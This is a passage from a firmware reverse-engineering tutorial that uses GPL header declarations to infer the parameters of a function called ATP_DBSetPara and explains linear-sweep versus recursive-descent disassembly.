If we wanna figure out what the 1st and 2nd parameters of a function like ATP_DBSetPara are, we can sometimes rely on the GPL source code. Lots of functions are not implemented in the kernel or any other open source component, but they’re still used from one of them. That means we can’t see the code we’re interested in, but we can see the extern declarations for it. Sometimes the source will include documentation comments or descriptive variable names; very useful info that the disassembly doesn’t provide:

ATP_DBSetPara extern declaration in gpl_source/inc/cfmapi.h

Unfortunately, the function documentation comment is not very useful in this case -seems like there were encoding issues with the file at some point, and everything written in Chinese was lost. At least now we know that the first argument is a list of keys, and the second is something they call ParamCMO. ParamCMO is a constant in our disassembly, so it’s probably just a reference to the key we’re trying to set.

Disassembly Methods — Linear Sweep vs Recursive Descent

The structure of a binary can vary greatly depending on compiler, developers, etc. How functions call each other is not always straightforward for a disassembler to figure out. That means you may run into lots of ‘orphaned’ functions, which exist in the binary but do not have a known caller.

Which disassembler you use will dictate whether you see those functions or not, some of which can be extremely important to us (e.g. the ping function in the web binary we reversed earlier). This is due to how they scan binaries for content:

  1. Linear Sweep: Read the binary one byte at a time, anything that looks like a function is presented to the user. This requires significant logic to keep false positives to a minimum
  2. Recursive Descent: We know the binary’s entry point. We find all functions called from main(), then we find the functions called from those, and keep recursively displaying functions until we’ve got “all” of them. This method is very robust, but any functions not referenced in a standard/direct way will be left out

Make sure your disassembler supports linear sweep if you feel like you’re missing any data. Make sure the code you’re looking at makes sense if you’re using linear sweep.